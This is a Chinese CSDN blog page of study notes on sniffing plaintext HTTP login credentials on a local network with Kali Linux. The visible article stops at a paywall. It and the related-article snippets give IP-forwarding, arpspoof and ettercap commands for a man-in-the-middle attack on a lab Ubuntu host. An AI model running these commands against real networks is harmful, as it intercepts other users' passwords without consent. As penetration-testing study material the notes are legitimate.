关于Kali获取HTTP账号密码的学习笔记

最新推荐文章于 2024-05-05 13:07:21 发布
最新推荐文章于 2024-05-05 13:07:21 发布
阅读量6.4k 收藏 11
点赞数 1
分类专栏: 渗透 Kali 文章标签: Kali 渗透 ARP欺骗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SKI_12/article/details/62064984
版权

HTTP协议是进行明文传输的,即在传输过程中不对数据进行加密。在局域网环境中,通过ARP欺骗,将目标主机的网络包都流经攻击者,然后再通过嗅探的方式从而获取到HTTP的一些数据信息。下面主要是利用ettercap来进行嗅探,目标主机还是选择Ubuntu。


先是在Kali中开启转发流量:

echo 1 > /proc/sys/net/ipv4/ip_forward

sysctl -w net.ipv4.ip_forward=1



进行ARP欺骗:

arpspoof -i eth0 -t 10.10.10.134 10.10.10.2

最低0.47元/天 解锁文章
Mi1k7ea
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Kali Linux 实战(二):HTTP账户密码获取
qq_41374940的博客
06-24 3880
1、开启IP转发    echo 1 > /proc/sys/net/ipv4/ip_forward2、ARP欺骗    arpspoof -i eth0 -t 172.16.9.xxx 172.16.8.xx3、密码获取    ettercap -Tq -i eth0    -Tq  >> 启动文本模式 ,q安静模式    -i 网卡...
Kali 实现爆破获取用户名密码
tryheart的博客
08-26 1万+
preferen–setting 然后在浏览器里面输入搭建好的服务器地址 右键 看长度
2024年Kali入门指南:完美安装与配置教程_clion kali,诚意分享
最新发布
2401_84254011的博客
05-05 895
接下来我们需要对自定义安装的kali进行相关配置,点击开启虚拟机,选择第一个启动进入系统:选择语言,这里选择中文简体,然后点击continue进入下一步:选择中国,继续下一步:选择键盘,汉语英语都可以,这里选择汉语吧:配置主机名,这里随便填:这里的域名可以不填写,直接下一步设置用户名和密码,注:用户名不能为root或admin,之后几步无脑默认继续。这里我设置kali
利用Kali Linux获取http协议加密的账户密码
湖北杰哥的博客
11-22 7108
利用Kali Linux获取http协议加密的账户密码
PHP2(phps)- URL编码解码原理
Welcome To Myon'Blog !
03-15 1105
PHP2、phps文件 URL解码、URL编码、代码审计、脚本编写、 ASCII与16进制见的相互转换
渗透测试】kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
kali学习笔记1.pdf
07-19
笔记记录了详细的从网络扫描,信息收集(被动信息收集技术讲解,主动信息收集(各层协议的主动扫描方法{从网络层到应用层},nmap扫描器的使用全参数讲解),系统漏洞扫描器缓...笔记还有第二章,可以直接搜索kali学习笔记2
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
Kali修改root密码及更换安装源.txt
05-08
Kali修改root密码及更换安装源
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
kali重置root密码
07-13
自己在玩渗透测试的时候遇到的问题,root密码重置的具体步骤都在里面
KALI渗透测试之密码破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
小白日记27:kali渗透测试之Web渗透-Http协议基础,WEB
ZiXuanFY的博客
10-09 2856
Http协议基础 Web技术发展【http://www.cnblogs.com/ProgrammerGE/articles/1824657.html】 静态WEB【网页】 动态WEB 属于一种应用程序基于数据库每个人看到的内容不同根据用户输入,返回不同结果 WEB攻击类型有数百种 WEB攻击面 1、Network 2、
kali的ifconfig不能显示IP的解决办法
weixin_41358807的博客
08-19 869
kali虚拟机的ip
Linux Kali 命令行版手动设置网络
weixin_46017292的博客
04-27 2290
命令行版Linux手动设置IP地址 一、 查询IP 输入 ifconfig 查看IP地址 可以看到没有IPv4地址 二、 配置IP地址 输入 sudo vim /etc/network/interfaces 输入密码 修改IP地址 按 i 进入编辑模式 将 allow-hotplug eth0 和 iface eth0 inet dhcp 这两行禁用 添加IP地址 在下方输入 auto eth0 iface eth0 inet static address IP地址 netmask 子网掩码 gateway
Kali Linux渗透测试——WEB渗透(二)
Captain_RB的博客
01-21 9500
Kali Linux渗透测试——WEB渗透(二) 笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——WEB渗透(二)漏洞挖掘1.目录遍历/文件包含2.文件上传3.SQL注入4.XSS(Cross-Site Scripting)5.CSRF(Cross Site Request Forgery)6.WebShell7.HTTPS攻击8.P...
Kali渗透测试——urlcrazy
dif90304的博客
05-25 378
Typo域名测试工具urlcrazy Typo域名是一类的特殊域名。用户将正确的域名错误拼写产生的域名被称为Typo域名。例如,www.baidu.com错误拼写为www.bidu.com,就形成一个Typo域名。对于热门网站的Typo域名会产生大量的访问量,通常都会被人抢注,以获取流量。而黑客也会利用Typo域名构建钓鱼网站。 Kali Linux提供对应的检测工...
kali base64 编码和解码
黑战士的博客
11-17 5953
为了对标准输入/输出或任何文件内容进行编码或解码,Linux 使用 base64 编码和解码系统。对数据进行编码和解码,使数据传输和存储过程更容易。编码和解码不同于加密和解密。通过解码可以很容易地揭示编码数据。所以,这个命令行实用工具不能用于数据安全。字母、数字和“=”符号用于对任何数据进行编码。 **句法: ** base64 [选项] [输入文件] [输出文件]** ** 您可以在 base64 命令中使用不同类型的选项。在编码或解码时,可以从任何文件或标准输入中获取数据。编码或解码后,您可以将输出发送
渗透测试01- kali下的arp欺骗获取web网站管理员密码
u010300900的博客
11-15 1776
渗透测试01- kali下的arp欺骗获取web网站管理员密码@TOC 初学者的笔记 1. 虚拟机vmware 网络设置为桥接模式 配置kali虚拟机ip与中间主机为统一网段 ifconfig eth0 192.168.1.55 netmask 255.255.255.0 配置完成后测试联通 2.arp欺骗 arpspoof -i eth0 -t 中间主机地址 web网站地址,成功后如图 3...
kali linux忘记账号密码
09-03
### 回答1: 如果您忘记了Kali Linux的账号密码,可以尝试以下方法: 1. 使用root账号登录:如果您在安装Kali Linux时设置了root账号密码,并且没有禁用root登录,您可以尝试使用root账号登录。在登录屏幕上输入用户名为“root”,密码为您设置的root密码即可。 2. 使用恢复模式:在启动Kali Linux时,按住Shift键,进入引导菜单。选择“Advanced options for Kali GNU/Linux”进入高级选项菜单,然后选择Kali Linux恢复模式。在恢复模式下,您将有机会以root用户身份登录系统并更改密码。 3. 使用Live CD:如果以上方法均不可用,您可以使用Kali Linux的安装光盘或USB启动计算机,然后选择“Live”模式进入系统。在该模式下,您可以以root用户身份访问您的硬盘,并更改您忘记的账户密码。 无论哪种方法,都需要一定的计算机知识和操作技能,请谨慎操作,避免数据丢失或系统损坏。 ### 回答2: Kali Linux是一款基于Debian的Linux发行版,主要用于渗透测试和安全审计。如果忘记了Kali Linux的账号密码,可以通过以下步骤进行重置: 1. 在Kali Linux的登录界面,点击用户图标后咖啡杯图标,进入“关机、重启、挂起”选项。 2. 在弹出的选项中,选择“重启并进入Grub菜单”。 3. 进入Grub菜单后,选择“高级选项”进入。 4. 在高级选项中,选择“恢复模式”,然后按Enter键进入。 5. 进入恢复模式后,在下一个菜单中选择“root”。这将以root权限进入系统。 6. 进入命令行界面后,输入命令“passwd <用户名>”,替换<用户名>为你需要重置密码的账号。 7. 系统会要求输入新密码两次以确认密码。输入新密码时不会显示任何字符,但实际上是被接受的。 8. 输入完新密码后,重新启动系统。 9. 在登录界面,使用刚刚设置的新密码进行登录。如果一切顺利,你将能够成功登录到Kali Linux。 需要注意的是,以上步骤仅适用于具有root权限的账号。如果忘记了root账号密码,可以尝试通过在Grub菜单中选择“恢复模式”并重置root密码来恢复访问权限,或者需要使用其他方法进行密码重置。 ### 回答3: 如果你忘记了Kali Linux的账号密码,有几种方法可以尝试重置密码。 第一种方法是使用单用户模式重置密码。在Kali Linux启动时,按下ESC键进入GRUB菜单。选择Kali Linux的高级选项,然后选择单用户模式。进入单用户模式后,系统会以root用户身份进入,并且不需要密码。在命令行中输入"passwd username"(将"username"替换为你忘记密码的账号)来重置密码。重置密码后,重新启动系统并使用新密码登录。 第二种方法是使用Live CD或USB重置密码。使用另一台电脑下载Kali Linux的ISO文件,并创建一个启动盘(CD或USB)。将启动盘插入忘记密码的计算机,并在启动时选择从启动盘启动。启动后,选择"Live"模式进入Kali Linux环境。打开终端,并使用命令"sudo fdisk -l"来找到你的系统分区。然后,在终端中依次输入以下命令: "sudo mount /dev/sdaX /mnt"(将"/dev/sdaX"替换为你的系统分区)和 "sudo chroot /mnt"。最后,输入"passwd username"来重置密码(将"username"替换为你忘记密码的账号)。完成后,重新启动系统并使用新密码登录。 无论使用哪种方法,重置密码时应该格外小心。确保你有合法的权限来重置密码,并确保在重置密码后保管好新密码,以免再次忘记。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值